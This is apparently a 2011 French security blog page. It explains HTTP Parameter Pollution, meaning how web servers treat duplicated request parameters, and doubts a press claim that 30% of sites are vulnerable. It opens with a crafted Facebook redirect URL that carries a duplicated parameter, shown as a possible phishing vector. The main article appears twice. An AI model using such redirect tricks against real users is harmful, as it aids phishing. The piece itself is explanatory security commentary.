http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.facebook.com%2Fpages%2FCin%25C3%25A9ma%2F104202296279674&h=8ae77&cb=3&p=AQCd3-oYLWKIy8Qz9FddRczehHGXLbUokzXxGei4HBNDeBcDcMr0TpAuAQ36lsm-IYmzLy62Zl6R48mn9VH_M2Yye8DiDcyYpL0tpQ&u=http://blog.madpowah.orgOn peut imaginer les conséquences en mettant une URL avec un site de phishing Facebook à la place de mon blog ...
Prudence donc à chaque clic !
19-03-2011 19:32:58
[Secu] Les HTTP Parameter Pollution
J'ai été interpelé par le titre raccoleur d'un
article de Clubic
indiquant que
30% des sites web présenteraient une faille
exploitable.
Cette vulnérabilité se nomme HPP ou HTTP Parameter
Pollution.
J'ai donc creuser un peu pour voir ce qu'il en était.
Les HPP ont été présentées en 2009 par l'OWASP. Les slides sont disponibles ici. Des chercheurs ont en fait constaté que les navigateurs interprétaient différement le fait qu'une variable soit envoyée plusieurs fois dans la meme requete. En effet certains vont ne considérer que la 1ère, d'autre la dernière et les plus intéressants vont concaténer les 2. Il est ainsi possible de voir la réaction des serveurs Web d'après les tests présentés ci dessous.
Ainsi on constate que IIS principalement concatène les données. Sachant que IIS représente environ 30% des serveurs Web sur Internet, on peut supposer que le journaliste a fait un énorme raccourci pour annoncer ses résultats.
Car au final à quoi sert une HPP ? A Rien ? "Presque". Si un site web ne propose aucune vulnérabilité complémentaire, cela ne sert dans 99% des cas strictement à rien. En effet au mieux cela va servir à passer un WAF (Youpi!) ou à la rigueur bypasser une protection CSRF comme présentée via la vuln Yahoo (qui va quand meme nécessiter une phase de SE donc peu critique).
La ou cela peut etre intéressant c'est pour tester un serveur Web perso qui n'apparait pas dans la liste et qui peut avoir un comportement étonnant comme l'exemple donné dans les slides pour CUPS. Et comme il faut une exception qui confirme la règle et donc nos 1% restant, il y a eu récemment une vulnérabilité qui a été récompensé par Google pour sa découverte et qui impactait le site Blogger.com. Le serveur propre à Google sembl(ait) gérer bizarrement les doubles variables en prenant une fois la 1ere puis l'autre. Du coup, lors du test de valeur, la valeur était légitime et la valeur prise lors de l'action était la 2e qui était pirate. Pour plus de détail sur cette attaque cliquez ici.
En conclusion les HTTP Parameter Pollution sont pour moi inutiles lors d'un pentest (sans WAF) dans le cas de l'utilisation d'un serveur web connu mais peuvent présenter un intéret dans le cas d'une application utilisant un serveur web différent de l'habitude. En tout cas on est très loin des 30% de sites web vulnérables :)
J'ai donc creuser un peu pour voir ce qu'il en était.
Les HPP ont été présentées en 2009 par l'OWASP. Les slides sont disponibles ici. Des chercheurs ont en fait constaté que les navigateurs interprétaient différement le fait qu'une variable soit envoyée plusieurs fois dans la meme requete. En effet certains vont ne considérer que la 1ère, d'autre la dernière et les plus intéressants vont concaténer les 2. Il est ainsi possible de voir la réaction des serveurs Web d'après les tests présentés ci dessous.
Ainsi on constate que IIS principalement concatène les données. Sachant que IIS représente environ 30% des serveurs Web sur Internet, on peut supposer que le journaliste a fait un énorme raccourci pour annoncer ses résultats.
Car au final à quoi sert une HPP ? A Rien ? "Presque". Si un site web ne propose aucune vulnérabilité complémentaire, cela ne sert dans 99% des cas strictement à rien. En effet au mieux cela va servir à passer un WAF (Youpi!) ou à la rigueur bypasser une protection CSRF comme présentée via la vuln Yahoo (qui va quand meme nécessiter une phase de SE donc peu critique).
La ou cela peut etre intéressant c'est pour tester un serveur Web perso qui n'apparait pas dans la liste et qui peut avoir un comportement étonnant comme l'exemple donné dans les slides pour CUPS. Et comme il faut une exception qui confirme la règle et donc nos 1% restant, il y a eu récemment une vulnérabilité qui a été récompensé par Google pour sa découverte et qui impactait le site Blogger.com. Le serveur propre à Google sembl(ait) gérer bizarrement les doubles variables en prenant une fois la 1ere puis l'autre. Du coup, lors du test de valeur, la valeur était légitime et la valeur prise lors de l'action était la 2e qui était pirate. Pour plus de détail sur cette attaque cliquez ici.
En conclusion les HTTP Parameter Pollution sont pour moi inutiles lors d'un pentest (sans WAF) dans le cas de l'utilisation d'un serveur web connu mais peuvent présenter un intéret dans le cas d'une application utilisant un serveur web différent de l'habitude. En tout cas on est très loin des 30% de sites web vulnérables :)